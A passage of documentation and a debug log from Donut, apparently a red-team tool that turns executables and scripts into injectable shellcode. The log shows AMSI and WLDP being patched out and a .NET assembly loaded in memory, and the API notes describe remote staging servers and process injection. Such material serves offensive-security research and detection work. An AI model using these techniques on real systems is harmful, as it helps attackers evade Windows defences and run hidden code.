426 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 09280348A6A2AFA7
427 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 3A49032E4107D985
428 DEBUG: payload.c:111:ThreadProc(): Resolving API address for FDE50FEB629EB834
429 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 4A4C764EFA89A84F
430 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 5D388BA18E017E53
431 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 4EA2B25D8FAABD2B
432 DEBUG: payload.c:111:ThreadProc(): Resolving API address for F1D278132E49F050
433 DEBUG: payload.c:111:ThreadProc(): Resolving API address for D05386A0F8FF7CAD
434 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 8121B63764A390A6
435 DEBUG: payload.c:111:ThreadProc(): Resolving API address for EB2BFAA408124470
436 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 11B666F77E7303F6
437 DEBUG: payload.c:111:ThreadProc(): Resolving API address for E8BD6B7A99981E38
438 DEBUG: payload.c:111:ThreadProc(): Resolving API address for DE78E211DE61998B
439 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 09D967C5479A0F9F
440 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 6CA1D167C2BFFA9A
441 DEBUG: payload.c:111:ThreadProc(): Resolving API address for AD11F6324A205C5E
442 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 5EAEF345362A2811
443 DEBUG: payload.c:111:ThreadProc(): Resolving API address for A0CC0DC36E8EDD2C
444 DEBUG: payload.c:111:ThreadProc(): Resolving API address for A4241EDCC8B14F85
445 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 756CEB8FF481A72E
446 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 8116A255193A09CA
447 DEBUG: payload.c:111:ThreadProc(): Resolving API address for AB14A786531404A1
448 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 1CF4A93D6896380A
449 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 61B393CC2DE33733
450 DEBUG: payload.c:111:ThreadProc(): Resolving API address for ADAF62D44179684A
451 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 7F9591B7380CD749
452 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 3CC76B29D676544F
453 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 725AA978FD2B1255
454 DEBUG: peb.c:87:FindExport(): 725aa978fd2b1255 is forwarded to api-ms-win-core-com-l1-1-0.CoInitializeEx
455 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
456 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoInitializeEx)
457 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 6C0F670F3C85A407
458 DEBUG: peb.c:87:FindExport(): 6c0f670f3c85a407 is forwarded to api-ms-win-core-com-l1-1-0.CoCreateInstance
459 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
460 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoCreateInstance)
461 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 2996694CA69B44E8
462 DEBUG: peb.c:87:FindExport(): 2996694ca69b44e8 is forwarded to api-ms-win-core-com-l1-1-0.CoUninitialize
463 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
464 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoUninitialize)
465 DEBUG: payload.c:127:ThreadProc(): Using module embedded in instance
466 DEBUG: inmem_dotnet.c:43:LoadAssembly(): Using module embedded in instance
467 DEBUG: inmem_dotnet.c:51:LoadAssembly(): CLRCreateInstance
468 DEBUG: inmem_dotnet.c:59:LoadAssembly(): ICLRMetaHost::GetRuntime("v4.0.30319")
469 DEBUG: inmem_dotnet.c:66:LoadAssembly(): ICLRRuntimeInfo::IsLoadable
470 DEBUG: inmem_dotnet.c:70:LoadAssembly(): ICLRRuntimeInfo::GetInterface
471 DEBUG: inmem_dotnet.c:78:LoadAssembly(): HRESULT: 00000000
472 DEBUG: inmem_dotnet.c:100:LoadAssembly(): ICorRuntimeHost::Start
473 DEBUG: inmem_dotnet.c:107:LoadAssembly(): ICorRuntimeHost::CreateDomain("TP7WFT9M")
474 DEBUG: inmem_dotnet.c:115:LoadAssembly(): IUnknown::QueryInterface
475 DEBUG: bypass.c:83:DisableAMSI(): Length of AmsiScanBuffer stub is 32 bytes.
476 DEBUG: bypass.c:89:DisableAMSI(): Overwriting AmsiScanBuffer
477 DEBUG: bypass.c:104:DisableAMSI(): Length of AmsiScanString stub is -16 bytes.
478 DEBUG: inmem_dotnet.c:123:LoadAssembly(): DisableAMSI OK
479 DEBUG: inmem_dotnet.c:127:LoadAssembly(): DisableWLDP OK
480 DEBUG: inmem_dotnet.c:134:LoadAssembly(): Copying 3072 bytes of assembly to safe array
481 DEBUG: inmem_dotnet.c:140:LoadAssembly(): AppDomain::Load_3
482 DEBUG: inmem_dotnet.c:147:LoadAssembly(): HRESULT : 00000000
483 DEBUG: inmem_dotnet.c:149:LoadAssembly(): Erasing assembly from memory
484 DEBUG: inmem_dotnet.c:155:LoadAssembly(): SafeArrayDestroy
485 DEBUG: inmem_dotnet.c:176:RunAssembly(): Using module embedded in instance
486 DEBUG: inmem_dotnet.c:184:RunAssembly(): Type is DLL
487 DEBUG: inmem_dotnet.c:255:RunAssembly(): SysAllocString("TestClass")
488 DEBUG: inmem_dotnet.c:259:RunAssembly(): SysAllocString("RunProcess")
489 DEBUG: inmem_dotnet.c:263:RunAssembly(): Assembly::GetType_2
490 DEBUG: inmem_dotnet.c:269:RunAssembly(): SafeArrayCreateVector(2 parameter(s))
491 DEBUG: inmem_dotnet.c:276:RunAssembly(): Adding "calc.exe" as parameter 1
492 DEBUG: inmem_dotnet.c:276:RunAssembly(): Adding "notepad.exe" as parameter 2
493 DEBUG: inmem_dotnet.c:292:RunAssembly(): Calling Type::InvokeMember_3
494 DEBUG: inmem_dotnet.c:306:RunAssembly(): Type::InvokeMember_3 : 00000000 : Success
495 DEBUG: inmem_dotnet.c:323:FreeAssembly(): Type::Release
496 DEBUG: inmem_dotnet.c:335:FreeAssembly(): Assembly::Release
497 DEBUG: inmem_dotnet.c:341:FreeAssembly(): AppDomain::Release
498 DEBUG: inmem_dotnet.c:347:FreeAssembly(): IUnknown::Release
499 DEBUG: inmem_dotnet.c:353:FreeAssembly(): ICorRuntimeHost::Stop
500 DEBUG: inmem_dotnet.c:356:FreeAssembly(): ICorRuntimeHost::Release
501 DEBUG: inmem_dotnet.c:362:FreeAssembly(): ICLRRuntimeInfo::Release
502 DEBUG: inmem_dotnet.c:368:FreeAssembly(): ICLRMetaHost::Release
503 DEBUG: payload.c:171:ThreadProc(): Erasing RW memory for instance
504 DEBUG: payload.c:174:ThreadProc(): Releasing RW memory for instance
505 </pre>
506
507 <p>Obviously you should be cautious with what files you decide to execute on your machine.</p>
508
509 </body>
510 </html>
+0
-511
docs/api.md
0
1 <html>
2 <body>
3
4 <h3>API</h3>
5
6 <ul>
7 <li><code>int DonutCreate(PDONUT_CONFIG pConfig)</code></li>
8 <li><code>int DonutDelete(PDONUT_CONFIG pConfig)</code></li>
9 </ul>
10
11 <p>When provided with a valid configuration, <code>DonutCreate</code> will generate a shellcode to execute a VBS/JS/EXE/DLL or XSL files in-memory. If the function returns <code>DONUT_ERROR_SUCCESS</code>, the configuration will contain three components:</p>
12
13 <ol>
14 <li>An encrypted <var>Instance</var></li>
15 <li>An encrypted <var>Module</var></li>
16 <li>A position-independent code (PIC) or shellcode with <var>Instance</var> embedded in it.</li>
17 </ol>
18
19 <p>The key to decrypt the <var>Module</var> is stored in the <var>Instance</var> so that if a module is discovered on a staging server by an adversary, it should not be possible to decrypt the contents without the instance. <code>DonutDelete</code> will release any memory allocated by a successful call to <code>DonutCreate</code>. The <var>Instance</var> will already be attached to the PIC ready for executing in-memory, but the module may require saving to disk if the PIC will retrieve it from a remote staging server.</p>
20
21 <h3>Configuration</h3>
22
23 <p>A configuration requires a target architecture (only x86 and x86-64 are currently supported), a path to a VBS/JS/EXE/DLL or XML file that will be executed in-memory by the shellcode, a namespace/class for a .NET assembly, including the name of a method to invoke and any parameters passed to the method. If the module will be stored on a staging server, a URL is required, but not a module name because that will be generated randomly.</p>
24
25 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CONFIG <span style='color:#800080; '>{</span>
26 <span style='color:#800000; font-weight:bold; '>int</span> arch<span style='color:#800080; '>;</span> <span style='color:#696969; '>// target architecture for shellcode </span>
27 <span style='color:#800000; font-weight:bold; '>char</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of domain to create for assembly</span>
28 <span style='color:#800000; font-weight:bold; '>char</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class and optional namespace</span>
29 <span style='color:#800000; font-weight:bold; '>char</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method to execute</span>
30 <span style='color:#800000; font-weight:bold; '>char</span> param<span style='color:#808030; '>[</span><span style='color:#808030; '>(</span>DONUT_MAX_PARAM<span style='color:#808030; '>+</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>)</span><span style='color:#808030; '>*</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string parameters passed to method, separated by comma or semi-colon</span>
31 <span style='color:#800000; font-weight:bold; '>char</span> file<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// assembly to create module from </span>
32 <span style='color:#800000; font-weight:bold; '>char</span> url<span style='color:#808030; '>[</span>DONUT_MAX_URL<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to root path of where module will be on remote http server</span>
33 <span style='color:#800000; font-weight:bold; '>char</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version to use.</span>
34 <span style='color:#800000; font-weight:bold; '>char</span> modname<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of module written to disk</span>
35
36 <span style='color:#800000; font-weight:bold; '>int</span> mod_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// .NET EXE/DLL, VBS,JS,EXE,DLL,XSL</span>
37 uint64_t mod_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_MODULE</span>
38 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>mod<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to donut module</span>
39
40 <span style='color:#800000; font-weight:bold; '>int</span> inst_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL</span>
41 uint64_t inst_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_INSTANCE</span>
42 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>inst<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to donut instance</span>
43
44 uint64_t pic_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of shellcode</span>
45 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>pic<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to PIC/shellcode</span>
46 <span style='color:#800080; '>}</span> DONUT_CONFIG<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CONFIG<span style='color:#800080; '>;</span>
47 </pre>
48
49 <table border="1">
50 <tr>
51 <th>Member</th>
52 <th>Description</th>
53 </tr>
54 <tr>
55 <td><code>arch</code></td>
56 <td>Indicates the type of assembly code to generate. <code>DONUT_ARCH_X86</code> and <code>DONUT_ARCH_X64</code> are self-explanatory. <code>DONUT_ARCH_X84</code> indicates dual-mode that combines shellcode for both x86 and amd64. ARM64 will be supported at some point.</td>
57 </tr>
58 <tr>
59 <td><code>domain</code></td>
60 <td>AppDomain name to create. If one is not specified by the caller, it will be generated randomly.</td>
61 </tr>
62 <tr>
63 <td><code>cls</code></td>
64 <td>The class name with method to invoke. A namespace is optional. e.g: <var>namespace.class</var></td>
65 </tr>
66 <tr>
67 <td><code>method</code></td>
68 <td>The method that will be invoked by the shellcode once a .NET assembly is loaded into memory. This also holds the name of an exported API if the module is an unmanaged DLL.</td>
69 </tr>
70 <tr>
71 <td><code>param</code></td>
72 <td>Contains a list of parameters for the .NET method or DLL function. Each separated by semi-colon or comma.</td>
73 </tr>
74 <tr>
75 <td><code>file</code></td>
76 <td>The path of a supported file type: VBS/JS/EXE/DLL or XSL.</td>
77 </tr>
78 <tr>
79 <td><code>url</code></td>
80 <td>If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this should contain the server and path of where module will be stored. e.g: https://www.rogueserver.com/modules/</td>
81 </tr>
82 <tr>
83 <td><code>runtime</code></td>
84 <td>The CLR runtime version to use for the .NET assembly. If none is provided, donut will try read from meta header. If that fails, v4.0.30319 is used by default.</td>
85 </tr>
86 <tr>
87 <td><code>modname</code></td>
88 <td>If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this will contain a randomly generated name for the module that should be used when saving the contents of <code>mod</code> to disk.</td>
89 </tr>
90 <tr>
91 <td><code>mod_type</code></td>
92 <td>Indicates the type of file detected by <code>DonutCreate</code>. For example, <code>DONUT_MODULE_VBS</code> indicates a VBScript file.</td>
93 </tr>
94 <tr>
95 <td><code>mod_len</code></td>
96 <td>The total size of the <var>Module</var> pointed to by <code>mod</code>.</td>
97 </tr>
98 <tr>
99 <td><code>mod</code></td>
100 <td>Points to encrypted <var>Module</var>. If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this should be saved to file using the <code>modname</code> and accessible via HTTP server.</td>
101 </tr>
102 <tr>
103 <td><code>inst_type</code></td>
104 <td><code>DONUT_INSTANCE_PIC</code> indicates a self-contained payload which means the .NET assembly is embedded in executable code. <code>DONUT_INSTANCE_URL</code> indicates the .NET assembly is stored on a remote server with a URL embedded in the instance.</td>
105 </tr>
106 <tr>
107 <td><code>inst_len</code></td>
108 <td>The total size of the <var>Instance</var> pointed to by <code>inst</code>.</td>
109 </tr>
110 <tr>
111 <td><code>inst</code></td>
112 <td>Points to an encrypted <var>Instance</var> after a successful call to <code>DonutCreate</code>. Since it's already attached to the <code>pic</code>, this is only provided for debugging purposes.</td>
113 </tr>
114 <tr>
115 <td><code>pic_len</code></td>
116 <td>The size of data pointed to by <code>pic</code>.</td>
117 </tr>
118 <tr>
119 <td><code>pic</code></td>
120 <td>Points to executable code for the target architecture which also contains an instance. This should be injected into a remote process.</td>
121 </tr>
122 </table>
123
124 <p>Everything that follows here concerns internal workings of Donut and is not required to generate a payload.</p>
125
126 <h3>Instance</h3>
127
128 <p>The position-independent code will always contain an <var>Instance</var> which can be viewed simply as a configuration for the code itself. It will contain all the data that would normally be stored on the stack or in the <code>.data</code> and <code>.rodata</code> sections of an executable. Once the main code executes, it will decrypt the instance before attempting to resolve the address of API functions. If successful, it will check if an executable file is embedded or must be downloaded from a remote staging server. To verify successful decryption of a module, a randomly generated string stored in the <code>sig</code> field is hashed using <var>Maru</var> and compared with the value of <code>mac</code>.</p>
129
130 <pre style='color:#000000;background:#ffffff;'><span style='color:#696969; '>// everything required for an instance goes into the following structure</span>
131 <span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_INSTANCE <span style='color:#800080; '>{</span>
132 uint32_t len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// total size of instance</span>
133 DONUT_CRYPT key<span style='color:#800080; '>;</span> <span style='color:#696969; '>// decrypts instance</span>
134
135 uint64_t iv<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the 64-bit initial value for maru hash</span>
136
137 <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span>
138 uint64_t hash<span style='color:#808030; '>[</span><span style='color:#008c00; '>64</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// holds up to 64 api hashes</span>
139 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>addr<span style='color:#808030; '>[</span><span style='color:#008c00; '>64</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// holds up to 64 api addresses</span>
140 <span style='color:#696969; '>// include prototypes only if header included from payload.h</span>
141 <span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>ifdef</span><span style='color:#004a43; '> PAYLOAD_H</span>
142 <span style='color:#800000; font-weight:bold; '>struct</span> <span style='color:#800080; '>{</span>
143 <span style='color:#696969; '>// imports from kernel32.dll or kernelbase.dll</span>
144 LoadLibraryA_t LoadLibraryA<span style='color:#800080; '>;</span>
145 GetProcAddress_t <span style='color:#400000; '>GetProcAddress</span><span style='color:#800080; '>;</span>
146 GetModuleHandleA_t GetModuleHandleA<span style='color:#800080; '>;</span>
147 VirtualAlloc_t <span style='color:#400000; '>VirtualAlloc</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// required to allocate RW memory for instance </span>
148 VirtualFree_t <span style='color:#400000; '>VirtualFree</span><span style='color:#800080; '>;</span>
149 VirtualQuery_t <span style='color:#400000; '>VirtualQuery</span><span style='color:#800080; '>;</span>
150 VirtualProtect_t <span style='color:#400000; '>VirtualProtect</span><span style='color:#800080; '>;</span>
151 Sleep_t <span style='color:#400000; '>Sleep</span><span style='color:#800080; '>;</span>
152 MultiByteToWideChar_t <span style='color:#400000; '>MultiByteToWideChar</span><span style='color:#800080; '>;</span>
153 GetUserDefaultLCID_t <span style='color:#400000; '>GetUserDefaultLCID</span><span style='color:#800080; '>;</span>
154
155 <span style='color:#696969; '>// imports from oleaut32.dll</span>
156 SafeArrayCreate_t SafeArrayCreate<span style='color:#800080; '>;</span>
157 SafeArrayCreateVector_t SafeArrayCreateVector<span style='color:#800080; '>;</span>
158 SafeArrayPutElement_t SafeArrayPutElement<span style='color:#800080; '>;</span>
159 SafeArrayDestroy_t SafeArrayDestroy<span style='color:#800080; '>;</span>
160 SafeArrayGetLBound_t SafeArrayGetLBound<span style='color:#800080; '>;</span>
161 SafeArrayGetUBound_t SafeArrayGetUBound<span style='color:#800080; '>;</span>
162 SysAllocString_t SysAllocString<span style='color:#800080; '>;</span>
163 SysFreeString_t SysFreeString<span style='color:#800080; '>;</span>
164 LoadTypeLib_t LoadTypeLib<span style='color:#800080; '>;</span>
165
166 <span style='color:#696969; '>// imports from wininet.dll</span>
167 InternetCrackUrl_t InternetCrackUrl<span style='color:#800080; '>;</span>
168 InternetOpen_t InternetOpen<span style='color:#800080; '>;</span>
169 InternetConnect_t InternetConnect<span style='color:#800080; '>;</span>
170 InternetSetOption_t InternetSetOption<span style='color:#800080; '>;</span>
171 InternetReadFile_t InternetReadFile<span style='color:#800080; '>;</span>
172 InternetCloseHandle_t InternetCloseHandle<span style='color:#800080; '>;</span>
173 HttpOpenRequest_t HttpOpenRequest<span style='color:#800080; '>;</span>
174 HttpSendRequest_t HttpSendRequest<span style='color:#800080; '>;</span>
175 HttpQueryInfo_t HttpQueryInfo<span style='color:#800080; '>;</span>
176
177 <span style='color:#696969; '>// imports from mscoree.dll</span>
178 CorBindToRuntime_t CorBindToRuntime<span style='color:#800080; '>;</span>
179 CLRCreateInstance_t CLRCreateInstance<span style='color:#800080; '>;</span>
180
181 <span style='color:#696969; '>// imports from ole32.dll</span>
182 CoInitializeEx_t CoInitializeEx<span style='color:#800080; '>;</span>
183 CoCreateInstance_t CoCreateInstance<span style='color:#800080; '>;</span>
184 CoUninitialize_t CoUninitialize<span style='color:#800080; '>;</span>
185 <span style='color:#800080; '>}</span><span style='color:#800080; '>;</span>
186 <span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>endif</span>
187 <span style='color:#800080; '>}</span> api<span style='color:#800080; '>;</span>
188
189 <span style='color:#696969; '>// everything from here is encrypted</span>
190 <span style='color:#800000; font-weight:bold; '>int</span> api_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the 64-bit hashes of API required for instance to work</span>
191 <span style='color:#800000; font-weight:bold; '>int</span> dll_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the number of DLL to load before resolving API</span>
192 <span style='color:#800000; font-weight:bold; '>char</span> dll_name<span style='color:#808030; '>[</span>DONUT_MAX_DLL<span style='color:#808030; '>]</span><span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// a list of DLL strings to load</span>
193
194 <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span>
195 <span style='color:#800000; font-weight:bold; '>char</span> s<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// amsi.dll</span>
196 uint32_t w<span style='color:#808030; '>[</span><span style='color:#008c00; '>2</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span>
197 <span style='color:#800080; '>}</span> amsi<span style='color:#800080; '>;</span>
198
199 <span style='color:#800000; font-weight:bold; '>char</span> clr<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// clr.dll</span>
200 <span style='color:#800000; font-weight:bold; '>char</span> wldp<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// wldp.dll</span>
201 <span style='color:#800000; font-weight:bold; '>char</span> wldpQuery<span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WldpQueryDynamicCodeTrust</span>
202 <span style='color:#800000; font-weight:bold; '>char</span> wldpIsApproved<span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WldpIsClassInApprovedList</span>
203
204 <span style='color:#800000; font-weight:bold; '>char</span> amsiInit<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiInitialize</span>
205 <span style='color:#800000; font-weight:bold; '>char</span> amsiScanBuf<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiScanBuffer</span>
206 <span style='color:#800000; font-weight:bold; '>char</span> amsiScanStr<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiScanString</span>
207
208 uint16_t wscript<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WScript</span>
209 uint16_t wscript_exe<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// wscript.exe</span>
210
211 <span style='color:#603000; '>GUID</span> xIID_IUnknown<span style='color:#800080; '>;</span>
212 <span style='color:#603000; '>GUID</span> xIID_IDispatch<span style='color:#800080; '>;</span>
213
214 <span style='color:#696969; '>// GUID required to load .NET assemblies</span>
215 <span style='color:#603000; '>GUID</span> xCLSID_CLRMetaHost<span style='color:#800080; '>;</span>
216 <span style='color:#603000; '>GUID</span> xIID_ICLRMetaHost<span style='color:#800080; '>;</span>
217 <span style='color:#603000; '>GUID</span> xIID_ICLRRuntimeInfo<span style='color:#800080; '>;</span>
218 <span style='color:#603000; '>GUID</span> xCLSID_CorRuntimeHost<span style='color:#800080; '>;</span>
219 <span style='color:#603000; '>GUID</span> xIID_ICorRuntimeHost<span style='color:#800080; '>;</span>
220 <span style='color:#603000; '>GUID</span> xIID_AppDomain<span style='color:#800080; '>;</span>
221
222 <span style='color:#696969; '>// GUID required to run VBS and JS files</span>
223 <span style='color:#603000; '>GUID</span> xCLSID_ScriptLanguage<span style='color:#800080; '>;</span> <span style='color:#696969; '>// vbs or js</span>
224 <span style='color:#603000; '>GUID</span> xIID_IHost<span style='color:#800080; '>;</span> <span style='color:#696969; '>// wscript object</span>
225 <span style='color:#603000; '>GUID</span> xIID_IActiveScript<span style='color:#800080; '>;</span> <span style='color:#696969; '>// engine</span>
226 <span style='color:#603000; '>GUID</span> xIID_IActiveScriptSite<span style='color:#800080; '>;</span> <span style='color:#696969; '>// implementation</span>
227 <span style='color:#603000; '>GUID</span> xIID_IActiveScriptParse32<span style='color:#800080; '>;</span> <span style='color:#696969; '>// parser</span>
228 <span style='color:#603000; '>GUID</span> xIID_IActiveScriptParse64<span style='color:#800080; '>;</span>
229
230 <span style='color:#696969; '>// GUID required to run XSL files</span>
231 <span style='color:#603000; '>GUID</span> xCLSID_DOMDocument30<span style='color:#800080; '>;</span>
232 <span style='color:#603000; '>GUID</span> xIID_IXMLDOMDocument<span style='color:#800080; '>;</span>
233 <span style='color:#603000; '>GUID</span> xIID_IXMLDOMNode<span style='color:#800080; '>;</span>
234
235 <span style='color:#800000; font-weight:bold; '>int</span> type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL </span>
236
237 <span style='color:#800000; font-weight:bold; '>struct</span> <span style='color:#800080; '>{</span>
238 <span style='color:#800000; font-weight:bold; '>char</span> url<span style='color:#808030; '>[</span>DONUT_MAX_URL<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// staging server hosting donut module</span>
239 <span style='color:#800000; font-weight:bold; '>char</span> req<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// just a buffer for "GET"</span>
240 <span style='color:#800080; '>}</span> http<span style='color:#800080; '>;</span>
241
242 uint8_t sig<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string to hash</span>
243 uint64_t mac<span style='color:#800080; '>;</span> <span style='color:#696969; '>// to verify decryption ok</span>
244
245 DONUT_CRYPT mod_key<span style='color:#800080; '>;</span> <span style='color:#696969; '>// used to decrypt module</span>
246 uint64_t mod_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// total size of module</span>
247
248 <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span>
249 PDONUT_MODULE p<span style='color:#800080; '>;</span> <span style='color:#696969; '>// for URL</span>
250 DONUT_MODULE x<span style='color:#800080; '>;</span> <span style='color:#696969; '>// for PIC</span>
251 <span style='color:#800080; '>}</span> module<span style='color:#800080; '>;</span>
252 <span style='color:#800080; '>}</span> DONUT_INSTANCE<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_INSTANCE<span style='color:#800080; '>;</span>
253 </pre>
254
255 <h3>Module</h3>
256
257 <p>Modules can be embedded in an <var>Instance</var> or stored on a remote HTTP server.</p>
258
259 <pre style='color:#000000;background:#ffffff;'><span style='color:#696969; '>// everything required for a module goes in the following structure</span>
260 <span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_MODULE <span style='color:#800080; '>{</span>
261 <span style='color:#603000; '>DWORD</span> type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// EXE, DLL, JS, VBS, XSL</span>
262 <span style='color:#603000; '>WCHAR</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version for .NET EXE/DLL</span>
263 <span style='color:#603000; '>WCHAR</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// domain name to use for .NET EXE/DLL</span>
264 <span style='color:#603000; '>WCHAR</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class and optional namespace for .NET EXE/DLL</span>
265 <span style='color:#603000; '>WCHAR</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method to invoke for .NET DLL or api for unmanaged DLL</span>
266 <span style='color:#603000; '>DWORD</span> param_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// number of parameters for DLL/EXE</span>
267 <span style='color:#603000; '>WCHAR</span> param<span style='color:#808030; '>[</span>DONUT_MAX_PARAM<span style='color:#808030; '>]</span><span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string parameters for DLL/EXE</span>
